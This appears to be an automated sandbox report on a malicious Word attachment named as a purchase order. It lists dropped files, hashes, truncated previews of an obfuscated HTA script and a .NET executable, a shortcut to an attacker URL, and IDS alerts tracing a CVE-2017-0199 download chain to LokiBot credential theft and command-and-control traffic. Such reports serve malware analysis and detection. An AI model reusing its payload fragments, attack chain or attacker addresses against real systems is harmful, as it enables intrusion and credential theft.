Preview:	......M.eFy...zg.#.o..L.l......S,...X.F...Fa.q............................f.....K..,.>v^.........G..J...@.:.&.q......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~$4.466364_2401 PACKING LIST.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)

Download File

Process:	C:\Users\user\AppData\Roaming\wininit.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.913749036393697
Encrypted:	false
SSDEEP:	12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
MD5:	66B03D1AFF27D81E62B53FC108806211
SHA1:	2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
SHA-256:	59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
SHA-512:	9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck

Download File

Process:	C:\Users\user\AppData\Roaming\wininit.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Download File

Process:	C:\Users\user\AppData\Roaming\wininit.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D898504A722BFF1524134C6AB6A5EAA5
SHA1:	E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
SHA-256:	878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
SHA-512:	26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
Malicious:	false
Preview:	..............................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO-000041492.docx.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Wed Nov 20 08:10:58 2024, length=35798, window=hide
Category:	dropped
Size (bytes):	1049
Entropy (8bit):	4.497157618725049
Encrypted:	false
SSDEEP:	24:8Ok/XTlwXbkuukS/RYregog4R8Dv3qd57u:8z/XTeXbk43+d9u
MD5:	88E8266BC3878123B535A67BE7E7F329
SHA1:	965A2F3CA518C21BF02749DE250D2EB8C7063D21
SHA-256:	4AB0A80B3222678997D5336EE87DB56838A38B479F6D94949D936678ADEC2115
SHA-512:	FC4FC7EC7451D45F524210330EEE7A96CFEA7179D7D0C6883EE4FC755657F16CD4E0D9E7959D4EB51CDFE63BA8FF4FC99954A05C1ABA871F58FA88807D204DE6
Malicious:	false
Preview:	L..................F.... .....X.r.....X.r...$9..,;..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....tY[I..user.8......QK.XtY[I...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....t.2....tY`I .PO-000~1.DOC..X.......WD..WD..........................P.O.-.0.0.0.0.4.1.4.9.2...d.o.c.x...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\367706\Users.user\Desktop\PO-000041492.docx.doc.,.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.0.0.0.0.4.1.4.9.2...d.o.c.x...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......367706..........D_....3N...W...9..W

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [doc]
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.781411195310162
Encrypted:	false
SSDEEP:	3:bDb6fnWgQcXSdIZU8jdLFSmX1gIZU8jdLFSv:byOgQVdIZUgdLFqIZUgdLFc
MD5:	AE3AC6B692198BB6E1E946872926C4D6
SHA1:	AD16742166FC1906FFA64F3751712C544866AB77
SHA-256:	D8003DF34F88083D35F1A920E461828946FB3F141F1DEB53F8D605A2AFB380E7
SHA-512:	DCF0EB0EA3CD68A3E5E727BD938D39136FF3FB99371ABFE3234C132754518A31A8774064A1E04D52B634A258491948BB4ED5041DADC33D45BACD15BC7280B21C
Malicious:	false
Preview:	[folders]..we on 66.63.187.231.url=0..PO-000041492.docx.LNK=0..[doc]..PO-000041492.docx.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\we on 66.63.187.231.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://66.63.187.231/xampp/wer/we/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.70623892865339
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/WUQL37Ja:HRYFVm/WUQM
MD5:	4C912F2DCACDBAC00B025B7CA0BB544E
SHA1:	77FA1116E7319A6E818C27FDD88A24BEEDAAA2B5
SHA-256:	03F1F1DB3B6D260FD77397DE886338B97513770ED72EC58AAF04BB57136762FF
SHA-512:	7EAFC6AF5C9D1B5AD918653B34D703A4532B4DEB7A5732D1140CFCDB6B10FE2471DFFEA2C4343F7FB055EF77D28E981DBF83E5A99BD9D06A0293EF9D1FC5C2FE
Malicious:	true
Preview:	[InternetShortcut]..URL=http://66.63.187.231/xampp/wer/we/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text, with very long lines (23388), with CRLF line terminators
Category:	dropped
Size (bytes):	23556
Entropy (8bit):	1.6848932886813717
Encrypted:	false
SSDEEP:	96:C2vy2KJTuvPTTwduJZA6/3P42e2+ip2k+:TLwuv6QP5f+F3
MD5:	EC0D423A3F72D69975A1E31A275F5377
SHA1:	213922FB8456ECAADC24889AFEC1AC6EF5010C68
SHA-256:	9FD433CD543AB161D2A3CCB96A265C79EE0BB1A513647C0C33C72114660C64AC
SHA-512:	8132F567ABFD4E3489204D1F3A9FC8292457CE10495345CD0CCFA8074233411C8305C4D73078A7DEE02B086FBC22B8AD7047DD4BC127DE337D0800771EDF53AD
Malicious:	true
Preview:	<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<ScRipT LANGuagE="vBscRIpT">..DIm..............................................................................................................................................................................................................................................................................................................................................tzHLdKvsEcRWyQFPNHoyTeRtKqrFUgUlAoRyLWkDbyxAAzslucnYWlBayRmyLBfwwVLvflcYiZZEpfzNUcHCcwlZBMnkhugupWLqSGPRjiRWzLULwlRXTOODbDPFQNUvpSkWIiuwlAwrOtAtidmZdngahQoxtJqNCmFehSLdxChEPdkYlgmxnXjGbbfCAhnKlFqCZNLZaRvxkRURPVoeiRQJQNIGSlJCzyNdRVnAdTGK..............................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\wininit.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	600576
Entropy (8bit):	7.913749036393697
Encrypted:	false
SSDEEP:	12288:VrOj+Ri3AgFdZeDZskwkzA0+7xUNq4KC73vUECPnsSnR83PdB0:xQ3AgSskwZNeEqdCPssS3F
MD5:	66B03D1AFF27D81E62B53FC108806211
SHA1:	2557EC8B32D0B42CAC9CABDE199D31C5D4E40041
SHA-256:	59586E753C54629F428A6B880F6AFF09F67AF0ACE76823AF3627DDA2281532E4
SHA-512:	9F8EF3DD8C482DEBB535B1E7C9155E4AB33A04F8C4F31ADE9E70ADBD5598362033785438D5D60C536A801E134E09FCD1BC80FC7AED2D167AF7F531A81F12E43D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:=g..............0...... .......&... ...@....@.. ....................................`..................................&..O....@..\|....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...\|....@......................@..@.reloc.......`.......(..............@..B.................&......H........6...(...........^................................................(......}.....{....r...p .....o5....{....o7...&....0...........{......o9.....}........&.......................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=..............+..E..........\b......2.{....oA...n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...

C:\Users\user\Desktop\~$-000041492.docx.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.974024955590173
TrID:	Word Microsoft Office Open XML Format document (49504/1) 58.23% Word Microsoft Office Open XML Format document (27504/1) 32.35% ZIP compressed archive (8000/1) 9.41%
File name:	PO-000041492.docx.doc
File size:	35'798 bytes
MD5:	78be86ebe4907d4195a9f9b7b09d9454
SHA1:	1136319ab7cb1b7b50ea3c93a8fd25c402c7f971
SHA256:	36121afec9959963b1c1d30dcb13b9031e445cebac5a62b353297c94bb3c2f75
SHA512:	793f42fd1656e5af51218ee9fc21db06c8f17df913369ac25adf921b4ede8bea367a7dd58f0f2294f9fd070702ae758a4e61c20801975fc08fd24c67c9f24328
SSDEEP:	768:c7BQYFJatj9gLjkB85vsgRxyZIwL4q+txAwuiiqemr6ld:uQeAj9gcB8SgD/wLotGi6ld
TLSH:	DAF2D0B2F75F513EE16A837265006A64C36FB051D709665337F0ACCCEC3A66B0E89B46
File Content Preview:	PK.........9tY.4..m...........[Content_Types].xmlUT.....=g..=g..=g.T.n.0..W.?D....CUU..]......{.n..6..wL(.* m.K...[f<q...[..........p+....m....,Df.S.@I...pp}.......&.d....4..h.... R[.Y.W?....6.z...RnM....4....5...=..s....d.M]..sNI.".ta....... ,.k..V..z.

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "PO-000041492.docx.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:	91974
Keywords:
Template:	Normal.dotm
Last Saved By:	91974
Revion Number:	2
Total Edit Time:	1
Create Time:	2024-10-29T11:50:00Z
Last Saved Time:	2024-10-29T11:51:00Z
Number of Pages:	1
Number of Words:	3
Number of Characters:	18
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:	Grizli777
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1Ole10Native, File Type: data, Stream Size: 26683

General
Stream Path:	\x1Ole10Native
CLSID:
File Type:	data
Stream Size:	26683
Entropy:	7.593676128863785
Base64 Encoded:	True
Data ASCII:	7 h . . . . 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . C : \\ U s e r s \\ 9 1 9 7 4 \\ O n e D r i v e \\ D e s k t o p \\ W o r d F i l e \\ N E W F I L E S \\ 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . . . . . C . . . C : \\ U s e r s \\ 9 1 9 7 4 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 4 . 4 6 6 3 6 4 _ 2 4 0 1 P A C K I N G L I S T . x l s x . e . . P K . . . . . . . . . . ! . . . . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . .
Data Raw:	37 68 00 00 02 00 34 2e 34 36 36 33 36 34 5f 32 34 30 31 20 20 50 41 43 4b 49 4e 47 20 4c 49 53 54 2e 78 6c 73 78 00 43 3a 5c 55 73 65 72 73 5c 39 31 39 37 34 5c 4f 6e 65 44 72 69 76 65 5c 44 65 73 6b 74 6f 70 5c 57 6f 72 64 46 69 6c 65 5c 4e 45 57 46 49 4c 45 53 5c 34 2e 34 36 36 33 36 34 5f 32 34 30 31 20 20 50 41 43 4b 49 4e 47 20 4c 49 53 54 2e 78 6c 73 78 00 00 00 03 00 43 00

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 0d 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T10:11:16.946086+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49169	66.63.187.231	80	TCP
2024-11-20T10:11:16.946091+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	66.63.187.231	80	192.168.2.22	49169	TCP
2024-11-20T10:11:25.038949+0100	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	66.63.187.231	80	192.168.2.22	49170	TCP
2024-11-20T10:11:25.324376+0100	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	66.63.187.231	80	192.168.2.22	49170	TCP
2024-11-20T10:11:34.232361+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.232361+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.232361+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.825229+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49171	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:34.936986+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:35.689000+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49172	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:35.753276+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.639270+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.639270+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49173	94.156.177.41	80	TCP
2024-11-20T10:11:36.644739+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49173	TCP
2024-11-20T10:11:36.788420+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:36.788420+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:36.788420+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.678741+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.678741+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49174	94.156.177.41	80	TCP
2024-11-20T10:11:37.690894+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49174	TCP
2024-11-20T10:11:37.865230+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:37.865230+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:37.865230+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:38.716249+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:38.716249+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49175	94.156.177.41	80	TCP
2024-11-20T10:11:38.721967+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49175	TCP
2024-11-20T10:11:39.935431+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:39.935431+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:39.935431+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.657533+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.657533+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49176	94.156.177.41	80	TCP
2024-11-20T10:11:40.665595+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49176	TCP
2024-11-20T10:11:40.804853+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:40.804853+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:40.804853+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.542743+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.542743+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49177	94.156.177.41	80	TCP
2024-11-20T10:11:41.549085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49177	TCP
2024-11-20T10:11:41.692875+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:41.692875+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:41.692875+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.435169+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.435169+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49178	94.156.177.41	80	TCP
2024-11-20T10:11:42.442906+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49178	TCP
2024-11-20T10:11:42.598311+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:42.598311+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:42.598311+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.357085+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.357085+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49179	94.156.177.41	80	TCP
2024-11-20T10:11:43.362123+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49179	TCP
2024-11-20T10:11:43.508451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:43.508451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:43.508451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.250418+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.250418+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49180	94.156.177.41	80	TCP
2024-11-20T10:11:44.258106+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49180	TCP
2024-11-20T10:11:44.410226+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:44.410226+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:44.410226+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:45.152866+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:45.152866+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49181	94.156.177.41	80	TCP
2024-11-20T10:11:45.158361+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49181	TCP
2024-11-20T10:11:46.066976+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:46.066976+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:46.066976+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:46.807743+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:46.807743+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49182	94.156.177.41	80	TCP
2024-11-20T10:11:46.817046+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49182	TCP
2024-11-20T10:11:47.094306+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:47.094306+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:47.094306+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:47.853851+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:47.853851+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49183	94.156.177.41	80	TCP
2024-11-20T10:11:47.859109+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.41	80	192.168.2.22	49183	TCP
2024-11-20T10:11:48.001931+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.001931+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.001931+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.762372+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49184	94.156.177.41	80	TCP
2024-11-20T10:11:48.762372+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49184	94.156.177.41	80	TCP
